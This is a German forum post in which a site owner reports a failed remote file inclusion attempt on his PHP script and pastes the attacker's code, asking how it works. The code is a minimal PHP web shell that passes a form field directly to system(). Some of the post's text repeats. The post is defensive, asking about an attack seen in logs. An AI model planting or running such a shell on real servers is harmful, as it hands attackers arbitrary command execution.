Neurodeamon
Erfahrenes Mitglied
Als paranoider Mensch sichere ich meine Scripts gerne gegen Unfug und mögliche Sicherheitslücken ab. Dementsprechend bekam ich eine nette Mail mit allen möglichen Daten - jemand hat versucht über einen Include folgenden Code einzulesen:
Kennt jemand die genaue Funktionsweise?
Auf dem in der Mail angegebenen Referer (irgend ein server) befand sich der PHP-Code - nicht interpretiert, sondern im Quellzustand. Es wurde dann versucht den Code über besagten include meines Scripts einzulesen - was natürlich nicht geklappt hat und mit einer Fehlermeldung quittiert wurde (und einer mail an mich).
Ich vermute mal, daß es sich um einen möglichen Exploit handelt, über PHP in den Server einzudringen (?).
PHP:
<?
$OS = system('uname -a');
echo "<OS>".$OS."</OS>";
?>
<form action="<?=$REQUEST_URI;?>" method=POST>
<input type=text name=lox value='<?=$lox;?>' size=40><br>
<input type=submit>
</form>
<pre>
<xmp>
<?=system($lox);?>
</xmp>
</pre>
Kennt jemand die genaue Funktionsweise?
Auf dem in der Mail angegebenen Referer (irgend ein server) befand sich der PHP-Code - nicht interpretiert, sondern im Quellzustand. Es wurde dann versucht den Code über besagten include meines Scripts einzulesen - was natürlich nicht geklappt hat und mit einer Fehlermeldung quittiert wurde (und einer mail an mich).
Ich vermute mal, daß es sich um einen möglichen Exploit handelt, über PHP in den Server einzudringen (?).
Zuletzt bearbeitet: